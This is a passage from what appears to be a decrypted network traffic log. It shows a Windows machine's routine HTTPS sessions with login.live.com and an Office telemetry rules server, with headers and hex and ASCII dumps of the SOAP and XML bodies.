                                                                                                                                                      2024-12-04 12:59:16 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      68192.168.2.44983240.126.53.17443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:16 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                      Accept: */*
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                      Content-Length: 4775
                                                                                                                                                      Host: login.live.com
                                                                                                                                                      2024-12-04 12:59:16 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                      2024-12-04 12:59:18 UTC653INHTTP/1.1 200 OK
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                      Expires: Wed, 04 Dec 2024 12:58:17 GMT
                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                      FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9
                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                      x-ms-route-info: C543_BAY
                                                                                                                                                      x-ms-request-id: 08bab835-7ef0-4fc1-b939-c408ee7c4bd9
                                                                                                                                                      PPServer: PPV: 30 H: PH1PEPF00011F24 V: 0
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:17 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 11410
                                                                                                                                                      2024-12-04 12:59:18 UTC11410INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      69192.168.2.44983613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:18 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:18 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 491
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                                      x-ms-request-id: 715419d5-801e-0078-38c7-45bac6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125918Z-1746fd949bddtfvqhC1EWRxbpg000000013g000000009c21
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:18 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      70192.168.2.44983313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:18 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:18 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 425
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                                      x-ms-request-id: 5f5d2afa-901e-0015-66cc-45b284000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125918Z-1746fd949bdkw94lhC1EWRxuz400000001a000000000ayuv
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:18 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      71192.168.2.44983413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:18 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:18 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 475
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                      x-ms-request-id: 935017b2-001e-0017-80c6-450c3c000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125918Z-1746fd949bdtlp5chC1EWRq1v40000000160000000006xuh
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:18 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      72192.168.2.44983513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:18 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:18 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 448
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                                      x-ms-request-id: 6baa9d1a-801e-0048-02ce-45f3fb000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125918Z-1746fd949bdb8xvchC1EWRmbd40000000190000000000rhr
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:18 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      73192.168.2.44983713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:18 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:18 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 416
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                                      x-ms-request-id: 0e2e5981-501e-0035-17c1-45c923000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125918Z-1746fd949bddgsvjhC1EWRum2c00000001k0000000003uaa
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:19 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      74192.168.2.44983840.126.53.17443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:19 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                      Accept: */*
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                      Content-Length: 4775
                                                                                                                                                      Host: login.live.com
                                                                                                                                                      2024-12-04 12:59:19 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                      2024-12-04 12:59:20 UTC569INHTTP/1.1 200 OK
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                      Expires: Wed, 04 Dec 2024 12:58:20 GMT
                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                      x-ms-route-info: C543_SN1
                                                                                                                                                      x-ms-request-id: 3313226e-7e72-4405-a60a-fcb5e7f0e341
                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F04D V: 0
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:20 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 11410
                                                                                                                                                      2024-12-04 12:59:20 UTC11410INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      75192.168.2.44983913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:20 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:20 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 479
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                                      x-ms-request-id: c73ff22a-601e-0097-54c1-45f33a000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125920Z-1746fd949bdxk6n6hC1EWRdr8c00000000yg00000000bx6m
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:20 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      76192.168.2.44984013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:20 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
